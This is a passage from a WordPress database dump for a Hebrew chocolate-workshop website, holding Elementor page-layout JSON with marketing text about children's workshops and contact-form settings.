;s:25:\"kids-choclate-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(547,126,'_menu_item_type','post_type'),(548,126,'_menu_item_menu_item_parent','379'),(549,126,'_menu_item_object_id','123'),(550,126,'_menu_item_object','page'),(551,126,'_menu_item_target',''),(552,126,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(553,126,'_menu_item_xfn',''),(554,126,'_menu_item_url',''),(555,123,'_elementor_data','[{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"79a5d320\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6acf6724\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"533340e\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"\",\"description\":\"\",\"button_text\":\"\",\"background_color\":\"#833ca3\",\"_id\":\"c001fa3\",\"background_image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"background_size\":\"cover\",\"background_ken_burns\":\"\",\"zoom_direction\":\"in\",\"background_overlay\":\"yes\",\"background_overlay_color\":\"rgba(0,0,0,0.5)\",\"background_overlay_blend_mode\":\"\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"link_click\":\"slide\",\"custom_style\":\"\",\"horizontal_position\":\"\",\"vertical_position\":\"\",\"text_align\":\"\",\"content_color\":\"\",\"repeater_text_shadow_text_shadow_type\":\"\",\"repeater_text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(0,0,0,0.3)\"}}],\"slides_height\":{\"unit\":\"px\",\"size\":457,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6f864c97\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"72d64ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d035a1b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"color: #000000;\\\">\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d1\\u05dc\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9 \\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05d4\\u05e0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd, \\u05d5\\u05d2\\u05d9\\u05e9\\u05d4 \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u2013 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d4\\u05d2\\u05e9\\u05de\\u05d4 \\u05e9\\u05dc \\u05d7\\u05dc\\u05d5\\u05dd<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d0\\u05d6 \\u05d5\\u05de\\u05ea\\u05de\\u05d9\\u05d3 \\u05d4\\u05d9\\u05d4 \\u05d4\\u05de\\u05d0\\u05db\\u05dc \\u05e9\\u05e7\\u05d9\\u05e8\\u05d1 \\u05d1\\u05d9\\u05df \\u05d4\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05db\\u05d0\\u05d7\\u05d3. \\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05d9\\u05d4\\u05d9\\u05d5 \\u05e7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05dc\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9\\u05e6\\u05dc \\u05e9\\u05d4\\u05d9\\u05d4 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7 \\u05db\\u05dc \\u05d4\\u05d9\\u05d5\\u05dd. <\\/span><br \\/><span style=\\\"color: #000000;\\\">\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5 \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05e9\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d0\\u05d6 \\u05d0\\u05dc \\u05ea\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05d6\\u05d5 \\u05e8\\u05d9\\u05e7\\u05d4 \\u05de\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd, \\u05db\\u05d9 \\u05d2\\u05dd \\u05d0\\u05ea\\u05dd \\u05ea\\u05d4\\u05e0\\u05d5 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05de\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d5\\u05de\\u05d5\\u05e9\\u05d7\\u05ea\\u05ea. \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05db\\u05dd, \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05de\\u05e2\\u05d9\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05e0\\u05d4\\u05e0\\u05d5 \\u05d4\\u05e8\\u05d1\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd.<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05db\\u05d5\\u05dc\\u05dd<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05db\\u05d0\\u05de\\u05d5\\u05e8, \\u05db\\u05d3\\u05d9 \\u05dc\\u05d4\\u05e9\\u05ea\\u05ea\\u05e3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d9\\u05df \\u05e6\\u05d5\\u05e8\\u05da \\u05d1\\u05e0\\u05d9\\u05e1\\u05d9\\u05d5\\u05df \\u05e7\\u05d5\\u05d3\\u05dd, \\u05d0\\u05ea\\u05dd \\u05dc\\u05d0 \\u05d6\\u05e7\\u05d5\\u05e7\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05e9\\u05e8\\u05d4 \\u05e9\\u05dc \\u05e7\\u05d5\\u05e0\\u05d3\\u05d9\\u05d8\\u05d5\\u05e8 \\u05d0\\u05d5 \\u05d8\\u05d1\\u05d7, \\u05d5\\u05d2\\u05dd \\u05dc\\u05d0 \\u05de\\u05de\\u05e9 \\u05d7\\u05d9\\u05d9\\u05d1\\u05d9\\u05dd \\u05dc\\u05d0\\u05d4\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05de\\u05d8\\u05d1\\u05d7. \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05de\\u05d4 \\u05d4\\u05d2\\u05d9\\u05dc \\u05e9\\u05dc\\u05db\\u05dd, \\u05d0\\u05d5 \\u05d0\\u05dd \\u05d4\\u05ea\\u05e2\\u05e1\\u05e7\\u05ea\\u05dd \\u05e7\\u05d5\\u05d3\\u05dd \\u05d1\\u05d4\\u05db\\u05e0\\u05ea \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05db\\u05dc \\u05e2\\u05d5\\u05d3 \\u05d0\\u05ea\\u05dd \\u05de\\u05e1\\u05d5\\u05e7\\u05e8\\u05e0\\u05d9\\u05dd \\u05de\\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d4\\u05db\\u05d9 \\u05de\\u05ea\\u05d5\\u05e7 \\u05d1\\u05e2\\u05d5\\u05dc\\u05dd, \\u05d5\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05e2\\u05dc\\u05d9\\u05d5 \\u05e7\\u05e6\\u05ea \\u05d9\\u05d5\\u05ea\\u05e8, \\u05de\\u05e7\\u05d5\\u05de\\u05db\\u05dd \\u05d0\\u05d9\\u05ea\\u05e0\\u05d5. <\\/span><br \\/><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05df \\u05d4\\u05d3\\u05e8\\u05da \\u05d4\\u05d8\\u05d5\\u05d1\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05dc\\u05dc\\u05de\\u05d5\\u05d3 \\u05d0\\u05d9\\u05da \\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05e6\\u05d5\\u05e8\\u05d5\\u05ea \\u05e9\\u05d5\\u05e0\\u05d5\\u05ea \\u05de\\u05d7\\u05d5\\u05de\\u05e8 \\u05d4\\u05d2\\u05dc\\u05dd, \\u05d0\\u05d9\\u05da \\u05dc\\u05e0\\u05e6\\u05dc \\u05d0\\u05ea \\u05d4\\u05d9\\u05ea\\u05e8\\u05d5\\u05e0\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05d0\\u05d9\\u05da \\u05dc\\u05d4\\u05d5\\u05e6\\u05d9\\u05d0 \\u05de\\u05de\\u05e0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05de\\u05d9\\u05d8\\u05d1 \\u05d2\\u05dd \\u05d1\\u05d0\\u05e8\\u05d5\\u05de\\u05d4 \\u05d5\\u05d2\\u05dd \\u05d1\\u05d8\\u05e2\\u05dd.<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27bd0bf0\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#000000\",\"background_color_b\":\"#692910\"},\"elements\":[{\"id\":\"6d89c620\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"10cb3984\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e8\\u05d5\\u05e6\\u05d4 \\u05e9\\u05e4\\u05e9\\u05d5\\u05d8 \\u05e0\\u05d7\\u05d6\\u05d5\\u05e8 \\u05d0\\u05dc\\u05d9\\u05da \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05e4\\u05e8\\u05d8\\u05d9\\u05dd?\",\"align\":\"center\",\"title_color\":\"#ffffff\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2cf1e353\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d7\\u05d3\\u05e9\",\"form_fields\":[{\"custom_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"25\",\"_id\":\"11ed1fb\",\"required\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"email\",\"field_type\":\"tel\",\"required\":\"true\",\"field_label\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"25\",\"_id\":\"f7dd8de\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"},{\"custom_id\":\"field_1\",\"field_type\":\"select\",\"required\":\"true\",\"field_label\":\"\\u05d0\\u05d6\\u05d5\\u05e8\",\"placeholder\":\"\\u05d8\\u05dc\\u05e4\\u05d5\\u05df\",\"width\":\"25\",\"_id\":\"05c0678\",\"field_options\":\"\\u05de\\u05e8\\u05db\\u05d6\\n\\u05e6\\u05e4\\u05d5\\u05df\\n\\u05d3\\u05e8\\u05d5\\u05dd\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"recaptcha_badge\":\"bottomright\",\"css_classes\":\"\",\"field_value\":\"\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d9\\u05d7\\u05d4\",\"button_size\":\"md\",\"button_width\":\"25\",\"selected_button_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"},\"email_to\":\"yaaripe@gmail.com\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocolate4u.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05d7\\u05d3\\u05e9\\u05d4 \\u05de\\u05d0\\u05ea \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocolate4u.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"\\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e0\\u05e9\\u05dc\\u05d7 \\u05d1\\u05d4\\u05e6\\u05dc\\u05d7\\u05d4.\",\"error_message\":\"\\u05d4\\u05ea\\u05e8\\u05d7\\u05e9\\u05d4 \\u05e9\\u05d2\\u05d9\\u05d0\\u05d4.\",\"required_field_message\":\"\\u05e9\\u05d3\\u05d4 \\u05d6\\u05d4 \\u05d4\\u05d5\\u05d0 \\u05e9\\u05d3\\u05d4 \\u05d7\\u05d5\\u05d1\\u05d4.\",\"invalid_message\":\"\\u05de\\u05e9\\u05d4\\u05d5 \\u05d4\\u05e9\\u05ea\\u05d1\\u05e9. \\u05d4\\u05d8\\u05d5\\u05e4\\u05e1 \\u05d0\\u05d9\\u05e0\\u05d5 \\u05d7\\u05d5\\u05e7\\u05d9.\",\"button_text_color\":\"#000000\",\"submit_actions\":[\"email\",\"redirect\",\"webhook\"],\"redirect_to\":\"https:\\/\\/www.chocolate4u.co.il\\/thanks\\/\",\"webhooks\":\"https:\\/\\/hooks.zapier.com\\/hooks\\/catch\\/2852444\\/osyxhok\\/\"},\"elements\":[],\"widgetType\":\"form\"},{\"id\":\"cd488d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5537d2bc\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2ae17d63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"62bb83a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d1\\u05d1\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd\\u00a0\\u00a0<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d7\\u05d5\\u05d5\\u05ea \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05d5\\u05ea \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d1\\u05d1\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd.<\\/span><br \\/><span style=\\\"color: #000000;\\\">\\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05de\\u05d2\\u05d5\\u05d5\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd, \\u05d5\\u05dc\\u05e2\\u05d1\\u05d5\\u05d3 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05e0\\u05db\\u05d5\\u05e0\\u05d4 \\u05e2\\u05dd \\u05e1\\u05d5\\u05d2\\u05d9 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05e9\\u05d5\\u05e0\\u05d9\\u05dd. \\u05ea\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05e9\\u05dc\\u05d1 \\u05d8\\u05e2\\u05de\\u05d9\\u05dd, \\u05d5\\u05ea\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d7\\u05d5\\u05d1\\u05e8\\u05ea \\u05de\\u05ea\\u05db\\u05d5\\u05e0\\u05d9\\u05dd \\u05de\\u05e1\\u05d5\\u05d3\\u05e8\\u05ea \\u05d1\\u05d0\\u05de\\u05e6\\u05e2\\u05d5\\u05ea\\u05d4 \\u05ea\\u05d5\\u05db\\u05dc\\u05d5 \\u05dc\\u05e9\\u05d7\\u05d6\\u05e8 \\u05db\\u05dc \\u05d0\\u05d7\\u05d3 \\u05de\\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d1\\u05e7\\u05dc\\u05d5\\u05ea \\u05d2\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4, \\u05d5\\u05dc\\u05e4\\u05e0\\u05e7 \\u05d0\\u05ea \\u05d4\\u05de\\u05e9\\u05e4\\u05d7\\u05d4 \\u05d5\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd. \\u05d2\\u05dd \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05dc\\u05db\\u05dd \\u05d9\\u05dc\\u05de\\u05d3\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05de\\u05de\\u05e9 \\u05db\\u05de\\u05d5 \\u05e9\\u05dc \\u05d2\\u05d3\\u05d5\\u05dc\\u05d9\\u05dd, \\u05d5\\u05d9\\u05e4\\u05ea\\u05d9\\u05e2\\u05d5 \\u05d0\\u05ea\\u05db\\u05dd \\u05d5\\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05dd \\u05d1\\u05d9\\u05e6\\u05d9\\u05e8\\u05d5\\u05ea \\u05d8\\u05e2\\u05d9\\u05de\\u05d5\\u05ea.<\\/span><\\/p><h2><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e1\\u05e7\\u05e8\\u05e0\\u05d9\\u05dd\\u00a0<\\/span><\\/h2><p><span style=\\\"color: #000000;\\\">\\u05d1\\u05d9\\u05df \\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05d7\\u05d5\\u05d2\\u05d2\\u05d9\\u05dd \\u05d9\\u05d5\\u05dd \\u05d4\\u05d5\\u05dc\\u05d3\\u05ea \\u05dc\\u05d9\\u05dc\\u05d3, \\u05d0\\u05d5 \\u05de\\u05ea\\u05db\\u05e0\\u05e0\\u05d9\\u05dd \\u05d1\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05ea \\u05de\\u05e6\\u05d5\\u05d5\\u05d4 \\u05e2\\u05dd \\u05db\\u05dc \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd, \\u05d0\\u05d9\\u05df \\u05db\\u05de\\u05d5 \\u05e4\\u05e2\\u05d9\\u05dc\\u05d5\\u05ea \\u05de\\u05ea\\u05d5\\u05e7\\u05d4 \\u05d5\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05ea \\u05e2\\u05dc \\u05de\\u05e0\\u05ea \\u05dc\\u05e9\\u05d3\\u05e8\\u05d2 \\u05dc\\u05db\\u05dd \\u05d0\\u05ea \\u05d4\\u05d0\\u05d9\\u05e8\\u05d5\\u05e2. \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd \\u05e9\\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05d1\\u05dc\\u05d9 \\u05d4\\u05e2\\u05d5\\u05d2\\u05d4, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd, \\u05d0\\u05d9\\u05df \\u05d7\\u05d2\\u05d9\\u05d2\\u05d4 \\u05d4\\u05d5\\u05dc\\u05de\\u05ea \\u05d1\\u05dc\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dc \\u05d4\\u05e9\\u05d5\\u05dc\\u05d7\\u05df.<\\/span><\\/p><p><span style=\\\"color: #000000;\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05de\\u05ea\\u05d0\\u05d9\\u05de\\u05d4 \\u05de\\u05d0\\u05d5\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e1\\u05e7\\u05e8\\u05e0\\u05d9\\u05dd, \\u05e9\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05de\\u05d8\\u05d1\\u05d7, \\u05e9\\u05e0\\u05d4\\u05e0\\u05d9\\u05dd \\u05dc\\u05d9\\u05d6\\u05d5\\u05dd \\u05d5\\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05e9\\u05d5\\u05e0\\u05d9\\u05dd, \\u05d5\\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd \\u05dc\\u05d4\\u05ea\\u05e2\\u05de\\u05e7 \\u05d1\\u05d7\\u05d5\\u05de\\u05e8\\u05d9 \\u05d4\\u05d2\\u05dc\\u05dd \\u05d5\\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05de\\u05d4\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d8\\u05e2\\u05d9\\u05dd \\u05d5\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05ea\\u05d7\\u05d5\\u05e9\\u05ea \\u05d4\\u05de\\u05e1\\u05d5\\u05d2\\u05dc\\u05d5\\u05ea \\u05e9\\u05dc \\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05e9\\u05de\\u05e9\\u05ea\\u05ea\\u05e4\\u05d9\\u05dd \\u05d1\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e6\\u05d5\\u05de\\u05d7\\u05ea \\u05e4\\u05dc\\u05d0\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9 \\u05e9\\u05d4\\u05e6\\u05dc\\u05d9\\u05d7\\u05d5 \\u05dc\\u05d9\\u05e6\\u05d5\\u05e8 \\u05dc\\u05d2\\u05de\\u05e8\\u05d9 \\u05dc\\u05d1\\u05d3 